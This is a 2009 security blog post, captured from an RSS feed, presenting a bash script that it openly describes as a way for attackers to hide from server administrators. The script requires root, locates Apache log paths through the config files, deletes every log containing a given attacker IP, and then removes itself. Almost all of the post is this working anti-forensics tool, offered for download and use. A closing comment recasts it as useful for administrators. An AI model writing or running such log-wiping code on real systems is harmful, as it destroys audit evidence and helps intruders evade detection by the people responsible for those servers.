Abysssec Security Research » linux http://www.abysssec.com/blog Security Researches , Advisories , Coding , Projects , Reversing , Exploitation , Fuzzing Tue, 31 Jan 2012 15:52:34 +0000 en hourly 1 http://wordpress.org/?v=3.3.1 Hidden Attack with clear log files in Unix , linux http://www.abysssec.com/blog/2009/01/31/hidden_attack_with_clear_log_file/ http://www.abysssec.com/blog/2009/01/31/hidden_attack_with_clear_log_file/#comments Sat, 31 Jan 2009 14:37:14 +0000 amiri http://abysssec.com/blog/?p=265 Hey ! I’m back  some exams of university :D and ….

Here is bash script for finding path of log files (Apache first and soon : all Logs) and deleting them for some attackers to be hidden from server admins !.Not bad ? Not good ? Where u use that !?.

At first we find path of directory contain some wanted logs and then searching line by line for log paths,finally founding attacker Ip in log files and removing log file. Be happy !

TEsTed On Debian etch4.0 and FreeBSD 6*

This is Rc 1. [download] : Log_f

and here is source code in bash :

#!/usr/local/bin/bash
### coded by t4z3v4r3d
### recurse function : i m not sure who has write that .So thanks unknown man
### made for FreeBSD First ....
if [ "`id -u`" != "0" ];then
echo "$0 cant run as $USER Please Give me the root perms!!!!! "
exit 1
fi
patern=$2
fl=/tmp/f.txt
fd=/tmp/find.txt
length=/tmp/l-f.txt
log_f=/tmp/log_f.txt
log_final=/tmp/final_log.txt
null=/dev/null
log_path=/tmp/log_Found_.txt
tm="`date | cut -d ":" -f 1`"
os=$OSTYPE
# you can add all paths for all os type !M$ windows IS NOT OS ....Exactly!
case $os in
Linux*) path=/etc/
;;
linux*) path=/etc/
;;
freebsd*) path=/usr/local/
;;
*) path=/
;;
esac
 
rm $fl
touch $fl
rm $fd
touch $fd
rm $log_f
touch $log_f
rm $log_final
touch $log_final
rm $log_path
touch $log_path
clear
 
echo "Enter attacker IP"
read -e ip
 
if [ "`find $path -name apache >> $fl`" ];then
	echo -e "\033[3;2f Main path Found ....\033[0;0m"
else
 
	if [ "`find $path -name apache2 >> $fl`" ];then
		echo "Founded Apache2 Config files"
	fi
fi 
 
recurse () {
for file in $(/bin/ls $1)
do fqfn=$1/$file
[[ -d $fqfn ]] && recurse $fqfn
[[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; }
[[ -f $fqfn ]] && recurse $fqfn
[[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; }
 
#########################################################
if [ -f $1 ];then
let "f=f+1"
	if [ "`ls $1 | grep -F .conf`" ];then
	let "t=t+1"
	cat $1 | grep -F .log | grep -v "#" | cut -d " " -f 2  >> $log_path
	nom[$t]="`cat $1 | grep -F .log | grep -v "#" | wc -l`"
	echo -e "reading $1\n `cat $1 | grep -F .log | grep -v "#"`" >> /tmp/r.txt
	let "nt=nt+${nom[$t]}"
	let "j=$nt+$t"
	fi
fi
################################################################################
### MOnitoring all acts
################################################################################
echo -e "\033[3;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m"
echo -e "\033[1;39m|\033[1;31m Scanned Files  :\033[4;25f \033[1;37m$f\033[1;39m\033[4;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;31m Path(s) found  :\033[5;25f \033[1;37m$l\033[1;39m\033[5;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;31m pattern found  :\033[6;25f \033[1;37m$t\033[1;39m\033[6;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;31m pattern total  :\033[7;25f \033[1;37m$j\033[1;39m\033[7;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;30m\033[8;2f Scanning `dirname ${1}`:::\033[1;39m\033[8;40f|\033[0;0m"
echo -e "\033[9;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m"
##############################################################################
done ; }
 
reader(){
cat $fl | while read line ;do
if [ "`ls $line | grep .conf`" != "" ];then
	recurse $line
fi
let "l=l+1"
done
}
 
reader
 
log_path_reader(){
cat $log_path | while read line ;do
if [ -f $line ];then
if [ "`cat $line | grep "$ip"`" != "" ];then
echo -en "\033[1;30mFounded[\033[1;31m"`cat $line | grep -c "$ip"`"	\033[1;30m] $ip in	"
echo -n "Removing $line"
rm $line
 
if [ ! -f $line ];then
echo -e "\033[1;39m	... Done !\033[0;0m"
else
echo -e "\033[1;31m	...Failed!\033[1;0m"
fi
 
fi
else
echo -e "\033[1;30mFile [\033[1;31m"$line    "\033[1;39mFile Dose not exist......\033[1;30m]"
fi
 
let "l2=l2+1"
done
}
echo -e "\033[8;3f\033[1;31mpath= $path OS= $os\033[0;0m"
echo -e "\033[11;1f\033[1;30mScanning DONE!! NOW : Removing Log Files\033[0;0m"
 
log_path_reader
 
echo -en "\033[1;30mRemoving 				   $0	"
 
rm $fl $log_path $0
 
 if [ ! -f  $0 ];then
 	echo -e "\033[1;39m	... Done !\033[0;0m"
 else
 	echo -e "\033[1;31m	...Failed!\033[1;0m"
 fi
echo -e "\033[1;37m Mail: amiri@abysssec.com\033[0;0m"

—————————————————

daphne  :

Hi readers .

Thanks from mr.Amiri .

when we’re talking about the secret or hidden in server , Log files in unix , linux server , recorded everything . this script is usefull for [white hacker ] and manager to clear major log files .

]]> http://www.abysssec.com/blog/2009/01/31/hidden_attack_with_clear_log_file/feed/ 0